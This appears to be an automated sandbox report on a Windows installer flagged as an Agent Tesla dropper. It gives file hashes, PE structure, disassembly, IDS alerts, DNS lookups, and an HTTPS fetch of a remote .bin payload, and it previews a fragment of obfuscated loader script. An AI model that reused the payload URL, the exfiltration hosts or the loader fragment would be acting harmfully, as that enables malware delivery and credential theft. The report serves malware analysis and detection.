SHA-512:	F3C52188A2C107F1011AE156BD94C8D2465C1D767A166049B374F1BEC023F0B123B185F280A5E3B8787BCA065AE69EA8A2945EB68E88BE778C202824D670BC19
Malicious:	false
Preview:	$Glucofrangulin=$Thorning;..<#Boligform Sdebadet Boformen Imaginrdelenes Soeren Belssedes #>..<#Unscoured rodebutikkers Witherweight Kaninerne Regelfaststtelsen Regerende Trampolinspring #>..<#Udspecialiseringens Europamesters Inddmningernes #>..<#Udladeres Payableness Sylfiders Bvens Ambitis Jgerkorpsets Centimetermaalets #>..<#Patentability Skaansommeres Echoized #>..<#Disobligingness Nervepatienterne Underminerings #>...$Crocketing = @'.Slowm.Atol,$SprogPOsmotr nreoKor sdGldsfuPrioncJor feudvalrMagnos,odtihS yggiEu yhpRyked=Susta$HemauiSennenValndtErf reBest nFathesoverpi ,ncatVinyle B tatSkbn eInddanChlorsPrealiBirthe mtsbnPum,evMuc seResi,nMonoluArres;Sh.ka. steof G.apuNeg.en SporcRepertAttaiisurp o ,rchn,eyde phasiUfrog.nForsig MelolricipaSarb d Modvs Lungo .uppmPrammeTungm Indda(Menin$.ikkeFSterieLyd gdRefintLudbeeOxyurr.aseiaOvervdWissisLresteVarsot,lashs Aca.,Mytac$Vis oiOpk,lnRen stNa,ure votn Bib.s Mismi BractPldereTaifutAmuleeFaxfrnP.kets C lo)Ben t Eksem{ Pter.Volte.Hand

C:\Users\user\AppData\Local\Temp\deciliteren\afstnings\Slagterknivene.Tre

Process:	C:\Users\user\Desktop\ZAMOWIEN.EXE.exe
File Type:	ISO-8859 text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	393439
Entropy (8bit):	6.672016070513227
Encrypted:	false
SSDEEP:	6144:QTiok9j+NGfgt2PNpP/iAb6WpT5bWsP8gCkoi/cmPZCzouP:QTiopGfgsq0Z5YgFRcmPZy/P
MD5:	439B3BA82D1F3DD320C6ECF23D6E82EC
SHA1:	92DED62319CB63936285FBC9A02FA650B45F5392
SHA-256:	1CC1F16263CB1FF8E2A7480A2DCC7A747BBBA5047EA2E44618E403DA774ABD35
SHA-512:	622952338704BA9C4598F21662572902074F9F44E67399BE77A75CF51AED771D3EB576A258151787A74EF30DFAF3001A9C04BEC205FBE5AABA5F5B5C770F83EC
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.85318447280769
TrID:	Win32 Executable (generic) a (10002005/4) 92.16% NSIS - Nullsoft Scriptable Install System (846627/2) 7.80% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	ZAMOWIEN.EXE.exe
File size:	456'011 bytes
MD5:	6b63bdc24b2e1162073514f7934a4f9c
SHA1:	c879e7e6aae7427d076acb33b55acb788aecddf7
SHA256:	4842cfe7f5fc8b3bcc22b0049e03edc16393e06ea5e486cb5e9ddbe7a21cd624
SHA512:	dae2cd4f41b7be76f97b1b7238819e019fba7a14eccb5768abe1d180eb0e28f933bd9b5a9fa52abc0119539703f5e453b70e01037d9a55fce9bf101b0df911b9
SSDEEP:	6144:NqC56ALcmpQFbVySc2pxkYihgnHcbS48a782EYCLrQjEBtMWc/+TxYyA:KA9WL5c2pEh2gV8axE1wlWmcYyA
TLSH:	07A42312AAC2D1FFEFE30971856AE372E736BE601641499B0B44FD7729D41630B168CA
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<`..x...x...x.......z...x...........i...,"..t.......y...Richx...........................PE..L...v..Q.................\....9....

File Icon


Icon Hash:	415d24c468697907

Static PE Info

General

Entrypoint:	0x4030ef
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x51E30576 [Sun Jul 14 20:09:26 2013 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	b40f29cd171eb54c01b1dd2683c9c26b

Entrypoint Preview

Instruction
sub esp, 00000184h
push ebx
push ebp
push esi
xor ebx, ebx
push edi
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 00409190h
mov dword ptr [esp+20h], ebx
mov byte ptr [esp+14h], 00000020h
call dword ptr [00407034h]
push 00008001h
call dword ptr [004070B0h]
push ebx
call dword ptr [0040728Ch]
push 00000008h
mov dword ptr [007A27B8h], eax
call 00007FB158B8AF28h
mov dword ptr [007A2704h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 0079DCB8h
call dword ptr [00407164h]
push 00409180h
push 007A1F00h
call 00007FB158B8ABD2h
call dword ptr [0040711Ch]
mov ebp, 007A8000h
push eax
push ebp
call 00007FB158B8ABC0h
push ebx
call dword ptr [00407114h]
cmp byte ptr [007A8000h], 00000022h
mov dword ptr [007A2700h], eax
mov eax, ebp
jne 00007FB158B881BCh
mov byte ptr [esp+14h], 00000022h
mov eax, 007A8001h
push dword ptr [esp+14h]
push eax
call 00007FB158B8A66Dh
push eax
call dword ptr [00407220h]
mov dword ptr [esp+1Ch], eax
jmp 00007FB158B88275h
cmp cl, 00000020h
jne 00007FB158B881B8h
inc eax
cmp byte ptr [eax], 00000020h
je 00007FB158B881ACh

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x73a4	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3b3000	0x1bf20	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x298	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5bc8	0x5c00	0dfea16d5f7d29b49617c6d476811b8f	False	0.6820652173913043	data	6.509979623096964	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x11ce	0x1200	6c31e0693072284f258d2c4a271de506	False	0.4524739583333333	OpenPGP Secret Key	5.236327486414569	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x3997f8	0x400	3e7188ab31a597163972f006b0a1b0b0	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x3a3000	0x10000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x3b3000	0x1bf20	0x1c000	847225eecf7ca990c46c3dfb540fbf34	False	0.8469412667410714	data	7.368806213976234	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x3b3418	0x8cb1	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9936141266624094
RT_ICON	0x3bc0d0	0x8321	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9934165450266615
RT_ICON	0x3c43f8	0x408d	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9940090771558245
RT_ICON	0x3c8488	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.3570539419087137
RT_ICON	0x3caa30	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.3925891181988743
RT_ICON	0x3cbad8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States	0.5237206823027718
RT_ICON	0x3cc980	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.5311371841155235
RT_ICON	0x3cd228	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	English	United States	0.3695121951219512
RT_ICON	0x3cd890	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States	0.3815028901734104
RT_ICON	0x3cddf8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.5124113475177305
RT_ICON	0x3ce260	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	United States	0.4422043010752688
RT_ICON	0x3ce548	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	English	United States	0.5033783783783784
RT_DIALOG	0x3ce670	0x100	data	English	United States	0.5234375
RT_DIALOG	0x3ce770	0x11c	data	English	United States	0.6091549295774648
RT_DIALOG	0x3ce890	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x3ce958	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x3ce9b8	0xae	data	English	United States	0.5977011494252874
RT_VERSION	0x3cea68	0x1ac	data	English	United States	0.5747663551401869
RT_MANIFEST	0x3cec18	0x305	XML 1.0 document, ASCII text, with very long lines (773), with no line terminators	English	United States	0.5614489003880984

Imports

DLL	Import
KERNEL32.dll	Sleep, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, CompareFileTime, SearchPathA, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, GetWindowsDirectoryA, SetFileAttributesA, lstrcmpiA, SetErrorMode, LoadLibraryA, lstrlenA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrcpyA, lstrcatA, GetSystemDirectoryA, GetVersion, GetProcAddress, WaitForSingleObject, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, GetModuleHandleA, LoadLibraryExA, GetCommandLineA, GetTempPathA, FreeLibrary, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, MulDiv, WriteFile, MultiByteToWideChar
USER32.dll	CreateWindowExA, EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, GetDC, SystemParametersInfoA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, CreateDialogParamA, SetTimer, GetDlgItem, wsprintfA, SetForegroundWindow, ShowWindow, IsWindow, LoadImageA, SetWindowLongA, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, PostQuitMessage, FindWindowExA, SendMessageTimeoutA, SetWindowTextA
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
ADVAPI32.dll	RegCloseKey, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegEnumValueA, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	CoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
VERSION.dll	GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-07T09:30:38.330805+0200	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	49956	109.73.128.91	443	TCP
2024-10-07T09:30:42.473707+0200	2029927	ET MALWARE AgentTesla Exfil via FTP	1	192.168.2.7	49973	185.146.87.128	21	TCP
2024-10-07T09:30:43.064427+0200	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	1	192.168.2.7	49974	185.146.87.128	53659	TCP
2024-10-07T09:30:43.070140+0200	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	1	192.168.2.7	49974	185.146.87.128	53659	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 7, 2024 09:30:37.138504982 CEST	49956	443	192.168.2.7	109.73.128.91
Oct 7, 2024 09:30:37.138557911 CEST	443	49956	109.73.128.91	192.168.2.7
Oct 7, 2024 09:30:37.138704062 CEST	49956	443	192.168.2.7	109.73.128.91
Oct 7, 2024 09:30:37.151355028 CEST	49956	443	192.168.2.7	109.73.128.91
Oct 7, 2024 09:30:37.151365042 CEST	443	49956	109.73.128.91	192.168.2.7
Oct 7, 2024 09:30:37.974283934 CEST	443	49956	109.73.128.91	192.168.2.7
Oct 7, 2024 09:30:37.974416971 CEST	49956	443	192.168.2.7	109.73.128.91
Oct 7, 2024 09:30:38.029490948 CEST	49956	443	192.168.2.7	109.73.128.91
Oct 7, 2024 09:30:38.029505968 CEST	443	49956	109.73.128.91	192.168.2.7
Oct 7, 2024 09:30:38.029869080 CEST	443	49956	109.73.128.91	192.168.2.7
Oct 7, 2024 09:30:38.030020952 CEST	49956	443	192.168.2.7	109.73.128.91
Oct 7, 2024 09:30:38.034615993 CEST	49956	443	192.168.2.7	109.73.128.91
Oct 7, 2024 09:30:38.079420090 CEST	443	49956	109.73.128.91	192.168.2.7
Oct 7, 2024 09:30:38.330832958 CEST	443	49956	109.73.128.91	192.168.2.7
Oct 7, 2024 09:30:38.330857992 CEST	443	49956	109.73.128.91	192.168.2.7
Oct 7, 2024 09:30:38.330941916 CEST	49956	443	192.168.2.7	109.73.128.91
Oct 7, 2024 09:30:38.330941916 CEST	49956	443	192.168.2.7	109.73.128.91
Oct 7, 2024 09:30:38.330962896 CEST	443	49956	109.73.128.91	192.168.2.7
Oct 7, 2024 09:30:38.331000090 CEST	49956	443	192.168.2.7	109.73.128.91
Oct 7, 2024 09:30:38.463033915 CEST	443	49956	109.73.128.91	192.168.2.7
Oct 7, 2024 09:30:38.463195086 CEST	49956	443	192.168.2.7	109.73.128.91
Oct 7, 2024 09:30:38.463442087 CEST	443	49956	109.73.128.91	192.168.2.7
Oct 7, 2024 09:30:38.463526964 CEST	49956	443	192.168.2.7	109.73.128.91
Oct 7, 2024 09:30:38.464313984 CEST	443	49956	109.73.128.91	192.168.2.7
Oct 7, 2024 09:30:38.464445114 CEST	49956	443	192.168.2.7	109.73.128.91
Oct 7, 2024 09:30:38.508079052 CEST	443	49956	109.73.128.91	192.168.2.7
Oct 7, 2024 09:30:38.508217096 CEST	49956	443	192.168.2.7	109.73.128.91
Oct 7, 2024 09:30:38.803272009 CEST	443	49956	109.73.128.91	192.168.2.7
Oct 7, 2024 09:30:38.803299904 CEST	443	49956	109.73.128.91	192.168.2.7
Oct 7, 2024 09:30:38.803380013 CEST	443	49956	109.73.128.91	192.168.2.7
Oct 7, 2024 09:30:38.803503990 CEST	49956	443	192.168.2.7	109.73.128.91
Oct 7, 2024 09:30:38.803550005 CEST	443	49956	109.73.128.91	192.168.2.7
Oct 7, 2024 09:30:38.803646088 CEST	49956	443	192.168.2.7	109.73.128.91
Oct 7, 2024 09:30:38.803816080 CEST	443	49956	109.73.128.91	192.168.2.7
Oct 7, 2024 09:30:38.803900957 CEST	49956	443	192.168.2.7	109.73.128.91
Oct 7, 2024 09:30:38.804024935 CEST	443	49956	109.73.128.91	192.168.2.7
Oct 7, 2024 09:30:38.804116964 CEST	49956	443	192.168.2.7	109.73.128.91
Oct 7, 2024 09:30:38.804447889 CEST	443	49956	109.73.128.91	192.168.2.7
Oct 7, 2024 09:30:38.804526091 CEST	49956	443	192.168.2.7	109.73.128.91
Oct 7, 2024 09:30:38.804610968 CEST	443	49956	109.73.128.91	192.168.2.7
Oct 7, 2024 09:30:38.804711103 CEST	49956	443	192.168.2.7	109.73.128.91
Oct 7, 2024 09:30:38.805469036 CEST	443	49956	109.73.128.91	192.168.2.7
Oct 7, 2024 09:30:38.805538893 CEST	49956	443	192.168.2.7	109.73.128.91
Oct 7, 2024 09:30:38.805758953 CEST	443	49956	109.73.128.91	192.168.2.7
Oct 7, 2024 09:30:38.805877924 CEST	49956	443	192.168.2.7	109.73.128.91
Oct 7, 2024 09:30:38.808871984 CEST	443	49956	109.73.128.91	192.168.2.7
Oct 7, 2024 09:30:38.808983088 CEST	49956	443	192.168.2.7	109.73.128.91
Oct 7, 2024 09:30:38.809340954 CEST	443	49956	109.73.128.91	192.168.2.7
Oct 7, 2024 09:30:38.809423923 CEST	49956	443	192.168.2.7	109.73.128.91
Oct 7, 2024 09:30:38.810309887 CEST	443	49956	109.73.128.91	192.168.2.7
Oct 7, 2024 09:30:38.810422897 CEST	49956	443	192.168.2.7	109.73.128.91
Oct 7, 2024 09:30:38.811219931 CEST	443	49956	109.73.128.91	192.168.2.7
Oct 7, 2024 09:30:38.811294079 CEST	49956	443	192.168.2.7	109.73.128.91
Oct 7, 2024 09:30:38.811595917 CEST	443	49956	109.73.128.91	192.168.2.7
Oct 7, 2024 09:30:38.811738968 CEST	49956	443	192.168.2.7	109.73.128.91
Oct 7, 2024 09:30:38.812783003 CEST	443	49956	109.73.128.91	192.168.2.7
Oct 7, 2024 09:30:38.812865973 CEST	49956	443	192.168.2.7	109.73.128.91
Oct 7, 2024 09:30:38.813458920 CEST	443	49956	109.73.128.91	192.168.2.7
Oct 7, 2024 09:30:38.813566923 CEST	49956	443	192.168.2.7	109.73.128.91
Oct 7, 2024 09:30:38.814284086 CEST	443	49956	109.73.128.91	192.168.2.7
Oct 7, 2024 09:30:38.814349890 CEST	49956	443	192.168.2.7	109.73.128.91
Oct 7, 2024 09:30:38.815304995 CEST	443	49956	109.73.128.91	192.168.2.7
Oct 7, 2024 09:30:38.815363884 CEST	49956	443	192.168.2.7	109.73.128.91
Oct 7, 2024 09:30:38.816200018 CEST	443	49956	109.73.128.91	192.168.2.7
Oct 7, 2024 09:30:38.816251040 CEST	49956	443	192.168.2.7	109.73.128.91
Oct 7, 2024 09:30:38.816349983 CEST	443	49956	109.73.128.91	192.168.2.7
Oct 7, 2024 09:30:38.816406965 CEST	49956	443	192.168.2.7	109.73.128.91
Oct 7, 2024 09:30:38.817451954 CEST	443	49956	109.73.128.91	192.168.2.7
Oct 7, 2024 09:30:38.817532063 CEST	49956	443	192.168.2.7	109.73.128.91
Oct 7, 2024 09:30:38.818324089 CEST	443	49956	109.73.128.91	192.168.2.7
Oct 7, 2024 09:30:38.818404913 CEST	49956	443	192.168.2.7	109.73.128.91
Oct 7, 2024 09:30:38.819272995 CEST	443	49956	109.73.128.91	192.168.2.7
Oct 7, 2024 09:30:38.819354057 CEST	49956	443	192.168.2.7	109.73.128.91
Oct 7, 2024 09:30:38.821007013 CEST	443	49956	109.73.128.91	192.168.2.7
Oct 7, 2024 09:30:38.821075916 CEST	49956	443	192.168.2.7	109.73.128.91
Oct 7, 2024 09:30:38.821393967 CEST	443	49956	109.73.128.91	192.168.2.7
Oct 7, 2024 09:30:38.821497917 CEST	49956	443	192.168.2.7	109.73.128.91
Oct 7, 2024 09:30:38.822365999 CEST	443	49956	109.73.128.91	192.168.2.7
Oct 7, 2024 09:30:38.822434902 CEST	49956	443	192.168.2.7	109.73.128.91
Oct 7, 2024 09:30:38.822446108 CEST	443	49956	109.73.128.91	192.168.2.7
Oct 7, 2024 09:30:38.822494984 CEST	443	49956	109.73.128.91	192.168.2.7
Oct 7, 2024 09:30:38.822544098 CEST	49956	443	192.168.2.7	109.73.128.91
Oct 7, 2024 09:30:38.822566986 CEST	49956	443	192.168.2.7	109.73.128.91
Oct 7, 2024 09:30:38.822581053 CEST	443	49956	109.73.128.91	192.168.2.7
Oct 7, 2024 09:30:40.541032076 CEST	49973	21	192.168.2.7	185.146.87.128
Oct 7, 2024 09:30:40.546040058 CEST	21	49973	185.146.87.128	192.168.2.7
Oct 7, 2024 09:30:40.546113014 CEST	49973	21	192.168.2.7	185.146.87.128
Oct 7, 2024 09:30:41.150233984 CEST	21	49973	185.146.87.128	192.168.2.7
Oct 7, 2024 09:30:41.150448084 CEST	49973	21	192.168.2.7	185.146.87.128
Oct 7, 2024 09:30:41.155347109 CEST	21	49973	185.146.87.128	192.168.2.7
Oct 7, 2024 09:30:41.360739946 CEST	21	49973	185.146.87.128	192.168.2.7
Oct 7, 2024 09:30:41.360883951 CEST	49973	21	192.168.2.7	185.146.87.128
Oct 7, 2024 09:30:41.365900040 CEST	21	49973	185.146.87.128	192.168.2.7
Oct 7, 2024 09:30:41.620598078 CEST	21	49973	185.146.87.128	192.168.2.7
Oct 7, 2024 09:30:41.620827913 CEST	49973	21	192.168.2.7	185.146.87.128
Oct 7, 2024 09:30:41.625773907 CEST	21	49973	185.146.87.128	192.168.2.7
Oct 7, 2024 09:30:41.831144094 CEST	21	49973	185.146.87.128	192.168.2.7
Oct 7, 2024 09:30:41.831824064 CEST	49973	21	192.168.2.7	185.146.87.128
Oct 7, 2024 09:30:41.836823940 CEST	21	49973	185.146.87.128	192.168.2.7
Oct 7, 2024 09:30:42.042131901 CEST	21	49973	185.146.87.128	192.168.2.7
Oct 7, 2024 09:30:42.042412043 CEST	49973	21	192.168.2.7	185.146.87.128
Oct 7, 2024 09:30:42.047267914 CEST	21	49973	185.146.87.128	192.168.2.7
Oct 7, 2024 09:30:42.252959967 CEST	21	49973	185.146.87.128	192.168.2.7
Oct 7, 2024 09:30:42.253185987 CEST	49973	21	192.168.2.7	185.146.87.128
Oct 7, 2024 09:30:42.258138895 CEST	21	49973	185.146.87.128	192.168.2.7
Oct 7, 2024 09:30:42.463851929 CEST	21	49973	185.146.87.128	192.168.2.7
Oct 7, 2024 09:30:42.468143940 CEST	49974	53659	192.168.2.7	185.146.87.128
Oct 7, 2024 09:30:42.473067999 CEST	53659	49974	185.146.87.128	192.168.2.7
Oct 7, 2024 09:30:42.473464966 CEST	49974	53659	192.168.2.7	185.146.87.128
Oct 7, 2024 09:30:42.473706961 CEST	49973	21	192.168.2.7	185.146.87.128
Oct 7, 2024 09:30:42.478586912 CEST	21	49973	185.146.87.128	192.168.2.7
Oct 7, 2024 09:30:43.064012051 CEST	21	49973	185.146.87.128	192.168.2.7
Oct 7, 2024 09:30:43.064426899 CEST	49974	53659	192.168.2.7	185.146.87.128
Oct 7, 2024 09:30:43.064428091 CEST	49974	53659	192.168.2.7	185.146.87.128
Oct 7, 2024 09:30:43.069545984 CEST	53659	49974	185.146.87.128	192.168.2.7
Oct 7, 2024 09:30:43.070065975 CEST	53659	49974	185.146.87.128	192.168.2.7
Oct 7, 2024 09:30:43.070139885 CEST	49974	53659	192.168.2.7	185.146.87.128
Oct 7, 2024 09:30:43.110641956 CEST	49973	21	192.168.2.7	185.146.87.128
Oct 7, 2024 09:30:43.275490999 CEST	21	49973	185.146.87.128	192.168.2.7
Oct 7, 2024 09:30:43.329190969 CEST	49973	21	192.168.2.7	185.146.87.128

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 7, 2024 09:30:36.618910074 CEST	64641	53	192.168.2.7	1.1.1.1
Oct 7, 2024 09:30:37.128889084 CEST	53	64641	1.1.1.1	192.168.2.7
Oct 7, 2024 09:30:40.467547894 CEST	53463	53	192.168.2.7	1.1.1.1
Oct 7, 2024 09:30:40.537631035 CEST	53	53463	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 7, 2024 09:30:36.618910074 CEST	192.168.2.7	1.1.1.1	0x45ec	Standard query (0)	www.corella.ro	A (IP address)	IN (0x0001)	false
Oct 7, 2024 09:30:40.467547894 CEST	192.168.2.7	1.1.1.1	0x832	Standard query (0)	ftp.rusticpensiune.ro	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 7, 2024 09:30:37.128889084 CEST	1.1.1.1	192.168.2.7	0x45ec	No error (0)	www.corella.ro	corella.ro		CNAME (Canonical name)	IN (0x0001)	false
Oct 7, 2024 09:30:37.128889084 CEST	1.1.1.1	192.168.2.7	0x45ec	No error (0)	corella.ro		109.73.128.91	A (IP address)	IN (0x0001)	false
Oct 7, 2024 09:30:40.537631035 CEST	1.1.1.1	192.168.2.7	0x832	No error (0)	ftp.rusticpensiune.ro		185.146.87.128	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.corella.ro

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49956	109.73.128.91	443	7660	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-07 07:30:38 UTC	195	OUT	GET /bazyland/whwWkpNOyoMrBlLiWEjvE44.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: www.corella.ro Cache-Control: no-cache
2024-10-07 07:30:38 UTC	223	IN	HTTP/1.1 200 OK Date: Mon, 07 Oct 2024 07:30:38 GMT Server: Apache Last-Modified: Thu, 03 Oct 2024 07:06:42 GMT Accept-Ranges: bytes Content-Length: 241216 Connection: close Content-Type: application/octet-stream
2024-10-07 07:30:38 UTC	7969	IN	Data Raw: 53 1a 4f 30 42 4b 30 6f f3 88 41 ab e7 58 a7 86 0c 48 b1 2d 15 84 35 7e 4c 9a 1c 24 e8 30 59 f9 44 63 80 33 d8 da 51 e8 21 f9 ec 37 39 51 4e 3a ac d1 2b 92 cf 5b 82 f2 9b 9e 0e a1 7f 63 70 d2 9c fe 20 8a 5e af 60 3a 4b 64 bf 3b 48 48 99 2f 1b 68 a8 6c 95 f2 a9 11 11 37 a5 40 a4 df 1f f3 ad 7d af 3c 96 84 7e 37 22 58 4a ec 7a 49 8e 0e af 03 eb c9 d9 cf 73 cd 0f 27 be 7b fb 7c 42 4d a0 86 8d 83 4c fb 37 92 4b b2 e4 18 81 d9 f0 9d cb 51 09 9f af 60 58 a0 38 ad b2 4a 0a 24 23 d5 05 a4 55 cf 41 79 3b 28 76 fe b3 04 26 b6 87 bc cc 44 15 31 ee d3 be 47 08 dc 28 23 0f 8d 8f f0 16 43 69 0f 72 f1 2c 2b 9f 66 a3 52 0f 95 fd fd 6d 1d 3b af 01 79 df d6 4c 8d dd 9d 83 b7 07 ac 1f 40 ec 8a f9 02 f3 ee 3b a7 79 e7 17 cf a6 28 c9 86 fb 56 c9 90 25 29 b7 d6 b5 5c 07 ee 62 Data Ascii: SO0BK0oAXH-5~L$0YDc3Q!79QN:+[cp ^`:Kd;HH/hl7@}<~7"XJzIs'{\|BML7KQ`X8J$#UAy;(v&D1G(#Cir,+fRm;yL@;y(V%)\b
